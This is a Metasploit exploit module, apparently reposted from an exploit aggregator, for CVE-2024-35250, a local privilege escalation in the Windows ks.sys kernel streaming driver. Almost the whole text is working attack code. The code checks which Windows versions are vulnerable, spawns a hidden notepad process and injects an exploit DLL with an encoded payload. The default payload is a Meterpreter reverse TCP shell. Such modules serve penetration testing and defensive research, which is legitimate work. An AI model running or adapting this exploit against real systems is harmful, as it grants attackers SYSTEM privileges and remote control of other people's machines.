Share
## https://sploitus.com/exploit?id=MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2024_35250_KS_DRIVER-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::Local::WindowsKernel
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection
  include Msf::Post::Windows::Version
  prepend Msf::Exploit::Remote::AutoCheck

  class VulnerableDriverNotPresent < StandardError; end
  class TargetNot64BitWindows < StandardError; end

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Access Mode Mismatch LPE in ks.sys',
        'Description' => %q{
          The ks.sys driver on Windows is one of the core components of Kernel Streaming and is installed by default.
          There exists a LPE in this driver which can be exploited on many recent versions of Windows 10,
          Windows 11, Windows Server 2022.
        },
        'Author' => [
          'AngelBoy', # discovery
          'varwara',    # PoC
          'jheysel-r7'  # module
        ],
        'References' => [
          [ 'URL', 'https://github.com/varwara/CVE-2024-35250'],
          [ 'URL', 'https://devco.re/blog/2024/08/23/streaming-vulnerabilities-from-windows-kernel-proxying-to-kernel-part1-en/'],
          [ 'URL', 'https://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html'],
          [ 'CVE', '2024-35250']
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Privileged' => true,
        'Arch' => [ ARCH_X64 ],
        'SessionTypes' => [ 'meterpreter' ],
        'Targets' => [
          ['Windows x64', { 'Arch' => ARCH_X64 }]
        ],
        'DefaultOptions' => {
          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
        },
        'DefaultTarget' => 0,
        'DisclosureDate' => '2024-06-11',
        'Notes' => {
          'Stability' => [ CRASH_SAFE, ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
          'Reliability' => [ REPEATABLE_SESSION, ]
        }
      )
    )
  end

  def target_compatible?(version)
    raise TargetNot64BitWindows, 'Non 64-bit Windows systems are not affected' unless session.platform == 'windows' && sysinfo['Architecture'] == ARCH_X64

    file_path = get_env('WINDIR') + '\\system32\\drivers\\ks.sys'
    raise VulnerableDriverNotPresent, 'The target system does not have ks.sys in system32\\drivers\\' unless file?(file_path)

    vprint_status("Windows Build Number = #{version.build_number}")

    return true if version.build_number.between?(Msf::WindowsVersion::Win10_1607, Msf::WindowsVersion::Win10_22H2)
    return true if version.build_number == Msf::WindowsVersion::Win11_21H2 || version.build_number == Msf::WindowsVersion::Win11_22H2
    return true if version.build_number.between?(Msf::WindowsVersion::Server2016, Msf::WindowsVersion::Server2022)

    false
  end

  def check
    version = get_version_info
    begin
      return Exploit::CheckCode::Appears("ks.sys is present, Windows Version detected: #{version}") if target_compatible?(version)
    rescue VulnerableDriverNotPresent, TargetNot64BitWindows => e
      return Exploit::CheckCode::Safe("#{e.class}: #{e.message}")
    end

    CheckCode::Safe("Version detected: #{version}")
  end

  def exploit
    fail_with(Failure::None, 'Session is already elevated') if is_system?

    if datastore['ForceExploit'] || !datastore['AutoCheck']
      begin
        version = get_version_info
        fail_with(Failure::NoTarget, "The exploit does not support this version of Windows: #{version}") unless target_compatible?(version)
        print_good("ks.sys is present, Windows Version detected: #{version}")
      rescue VulnerableDriverNotPresent, TargetNot64BitWindows => e
        fail_with(Failure::NoTarget, "#{e.class}: #{e.message}")
      end
    end

    print_status('Launching notepad to host the exploit...')
    notepad_path = get_notepad_pathname(ARCH_X64, client.sys.config.getenv('windir'), ARCH_X64)

    print_status("The notepad path is: #{notepad_path}")
    notepad_process = client.sys.process.execute(notepad_path, nil, { 'Hidden' => true })
    print_status("The notepad pid is: #{notepad_process.pid}")
    encoded_payload = payload.encoded
    execute_dll(
      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2024-35250', 'CVE-2024-35250.x64.dll'),
      [encoded_payload.length].pack('I<') + encoded_payload,
      notepad_process.pid
    )
  end
end